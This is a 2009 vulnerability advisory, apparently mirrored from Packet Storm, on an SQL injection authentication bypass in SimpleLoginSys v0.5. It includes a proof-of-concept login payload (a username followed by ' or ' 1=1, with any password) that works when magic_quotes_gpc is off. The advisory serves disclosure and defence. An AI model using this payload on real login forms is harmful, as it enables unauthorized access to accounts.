SimpleLoginSys 0.5 SQL Injection

🗓️ 05 Aug 2009 00:00:00Reported by SirGodType

packetstorm🔗 packetstormsecurity.com👁 13 Views

SimpleLoginSys 0.5 SQL Injection Vulnerability discovered by SirGod, affects v0.5 with Auth Bypass using SQL Injectio

`####################################################################################  
[+] SimpleLoginSys v0.5 (Auth Bypass) SQL Injection Vulnerability  
[+] Discovered By SirGod  
[+] http://insecurity-ro.org  
[+] http://h4cky0u.org  
[+] download : http://sourceforge.net/projects/simplesiteadmin/files/simpleloginsys/SimpleLoginSys%20v0.5/simpleloginsys0.5.zip/download  
  
####################################################################################  
  
[+] SQL Injection (Auth Bypass)  
  
- Note : magic_quotes_gpc = off  
  
- PoC  
  
Username : [REAL_NICKNAME] ' or ' 1=1  
Password : anything  
  
####################################################################################  
  
`

05 Aug 2009 00:00Current

0.4Low risk

Vulners AI Score0.4